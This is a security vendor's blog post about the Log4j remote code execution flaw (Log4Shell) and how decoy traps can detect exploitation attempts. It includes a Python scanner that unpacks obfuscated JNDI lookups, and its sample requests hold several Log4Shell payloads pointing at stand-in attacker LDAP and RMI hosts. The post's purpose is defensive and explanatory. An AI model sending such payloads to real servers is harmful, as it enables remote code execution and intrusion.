Using DeceptionGrid to Detect and Defeat Exploits of Log4j Remote Code Execution (RCE) Vulnerability
Just two weeks ago, in Deception – A Shield Between Vulnerability Disclosure and Patch Deployment: The Case of CVE-2021-22005, we discussed the case of a vCenter vulnerability and how to mitigate it with TrapX DeceptionGrid. Only eight days later, on December 9th, 2021, a critical vulnerability in Log4j (also known as Log4Shell), the popular Java-based logging package, was publicly disclosed: CVE-2021-44228.
The JNDI lookup features of Apache Log4j2, which are used in configuration, log messages, and parameters, do not protect against attacker-controlled LDAP and other JNDI-related endpoints. An attacker who can control log messages or log message parameters can cause the application to load and execute arbitrary code from an attacker-controlled LDAP server when message lookup substitution is enabled, which it is by default in affected versions.
A significant number of Java-based applications use log4j as their logging utility and are exposed to this vulnerability.
Exploit code for this vulnerability has been made publicly available, and according to Symantec, exploitation attempts have already been detected in the wild.
Impact on TrapX DeceptionGrid
DeceptionGrid, including all versions of all product components, is not susceptible to the log4j vulnerability.
How can TrapX DeceptionGrid help?
TrapX DeceptionGrid can provide early detection alerts, enabling response to cybercriminals attempting to exploit the Log4j vulnerability.
Log4j affects millions of devices and applications worldwide. One of the biggest challenges for organizations is to map and explore all applications and devices, used in house or in the cloud, that utilize Log4j, and to address the risk to each one of them. This process of exploring and identifying all applications and devices that are vulnerable to Log4j can take some time, and in some situations organizations may mistakenly skip or miss some unpatched applications or devices. Moreover, the process of patch deployments and updates requires a significant amount of time in large organizations.
With DeceptionGrid, we significantly reduce the risk to organizations during this period of mapping, exploring and patching, by enabling our customers to easily create as many decoy traps as they want across their networks.
Both in internal network segments and in external DMZ zones, TrapX DeceptionGrid decoys can alert upon any attempt to exploit the vulnerability in your network. Optionally, through our ecosystem integrations, DeceptionGrid can automatically trigger remediation.
Below is a preview of our upcoming release: when an attacker attempts to exploit this vulnerability against a decoy, the alert explicitly indicates that a Log4j exploitation attempt is in progress and reveals the attacker's IP address, host name, and the exploit command used:
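To make concrete both the injection mechanism described above (an attacker-controlled string that Log4j would interpret as a `${jndi:...}` lookup) and the kind of alert a decoy can raise from it (attacker IP, targeted host name, callback endpoint and the payload itself), here is an added example of the detection logic a decoy web listener could run over incoming HTTP requests. This is illustrative code written for this article, not TrapX DeceptionGrid code; the request format, the sample requests and all IP addresses and host names are constructed, and the evasion handling covers only the common `lower`, `upper`, `:-` default-value and URL-encoding tricks, not every obfuscation seen in the wild.

```python
import re
from dataclasses import dataclass
from typing import Dict, List, Optional
from urllib.parse import unquote

# An innermost lookup: a ${...} whose body contains no further ${ or }.
INNER_LOOKUP = re.compile(r"\$\{([^${}]*)\}")
# The callback endpoint inside a resolved jndi lookup, e.g. jndi:ldap://host:1389/Exploit
JNDI_TARGET = re.compile(r"jndi:([a-z]+)://?([^/\s}]+)", re.IGNORECASE)


@dataclass
class Detection:
    client_ip: str      # address the request came from (the attacker)
    target_host: str    # Host header, i.e. the decoy the attacker believes it is hitting
    location: str       # "request-line" or the header name carrying the payload
    scheme: str         # ldap, ldaps, rmi, dns, ...
    callback: str       # attacker-controlled host[:port] the victim would connect to
    raw: str            # payload exactly as received
    normalized: str     # payload with the handled evasions resolved


def resolve_lookup(body: str) -> Optional[str]:
    """Resolve the non-JNDI lookups attackers nest to hide the 'jndi' token.
    Returns None for the jndi lookup itself, which must be kept intact."""
    key, _, rest = body.partition(":")
    key = key.lower()
    if key == "jndi":
        return None
    if key == "lower":
        return rest.lower()
    if key == "upper":
        return rest.upper()
    if ":-" in body:                      # ${::-x}, ${env:NOPE:-x}, ${sys:NOPE:-x}
        return body.split(":-", 1)[1]     # unknown variable -> default value
    return ""                             # any other lookup: drop it and keep scanning


def normalize(value: str, max_rounds: int = 50) -> str:
    """URL-decode (twice, for double encoding) and resolve nested lookups innermost-first.
    Bounded by max_rounds so hostile input cannot make the scanner spin."""
    text = unquote(unquote(value))
    for _ in range(max_rounds):
        replaced = False

        def _sub(m: "re.Match[str]") -> str:
            nonlocal replaced
            result = resolve_lookup(m.group(1))
            if result is None:
                return m.group(0)         # jndi lookup stays as-is
            replaced = True
            return result

        text = INNER_LOOKUP.sub(_sub, text)
        if not replaced:
            break
    return text


def scan_request(client_ip: str, request_line: str, headers: Dict[str, str]) -> List[Detection]:
    """Scan the request line and every header value for JNDI lookup payloads."""
    target_host = headers.get("Host", "-")
    findings: List[Detection] = []
    for location, raw in [("request-line", request_line)] + list(headers.items()):
        norm = normalize(raw)
        for m in JNDI_TARGET.finditer(norm):
            findings.append(Detection(client_ip, target_host, location,
                                      m.group(1).lower(), m.group(2), raw, norm))
    return findings


def alert_line(d: Detection) -> str:
    """One-line alert in the spirit of what a deception platform would surface."""
    return (f"LOG4SHELL attempt: attacker={d.client_ip} target={d.target_host} "
            f"via={d.location} callback={d.scheme}://{d.callback} payload={d.normalized}")


if __name__ == "__main__":
    # Constructed sample traffic against a decoy; addresses are documentation ranges.
    samples = [
        ("198.51.100.7", "GET /login?user=${jndi:ldap://203.0.113.5:1389/Exploit} HTTP/1.1",
         {"Host": "decoy-web01.corp.example", "User-Agent": "curl/7.68.0"}),
        ("198.51.100.7", "GET / HTTP/1.1",
         {"Host": "decoy-web01.corp.example",
          "User-Agent": "${${lower:j}${::-n}${env:NOPE:-d}i:${lower:L}dap://203.0.113.5:1389/a}"}),
        ("198.51.100.9", "GET /?q=%24%7Bjndi%3Armi%3A%2F%2F198.51.100.23%2Fobj%7D HTTP/1.1",
         {"Host": "decoy-web01.corp.example"}),
        ("10.0.0.5", "GET /index.html HTTP/1.1",
         {"Host": "decoy-web01.corp.example", "User-Agent": "Mozilla/5.0"}),
    ]
    for ip, line, hdrs in samples:
        for det in scan_request(ip, line, hdrs):
            print(alert_line(det))
```

Two design points worth noting. Lookups are resolved innermost-first and the `jndi` lookup is deliberately left unresolved, so `${${lower:j}ndi:...}` collapses to `${jndi:...}` without the scanner ever acting on the lookup the way Log4j would. And the alert carries the resolved callback endpoint separately from the raw payload: the callback host is what a responder blocks at the egress firewall, while the raw payload is what goes into the incident record.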
In today’s world, security teams must take immediate action and patch all relevant applications and devices in the organization. They also have to address their risk exposure during patching cycles with active defense techniques such as those offered by TrapX DeceptionGrid. With such techniques you gain time and can prioritize your handling of threats while patching the applications and devices affected by this and other vulnerabilities. Increase your organization’s early detection capabilities, and reduce the chances of being breached by these and other exploits.
About TrapX Security
TrapX provides a new generation of deception technology that delivers real-time breach detection and prevention. Our proven solutions immerse tangible IT assets in a virtual minefield of traps that misinform and misdirect would-be attackers, alerting SOC teams to malicious activity with immediate, actionable intelligence. Our solutions enable our customers to isolate, rapidly fingerprint, and disable new zero-day attacks and APTs in real time. TrapX Security has thousands of government and Global 2000 users worldwide, serving customers in manufacturing, defense, healthcare, finance, energy, consumer products, and other vital industries. For more information, visit www.trapx.com.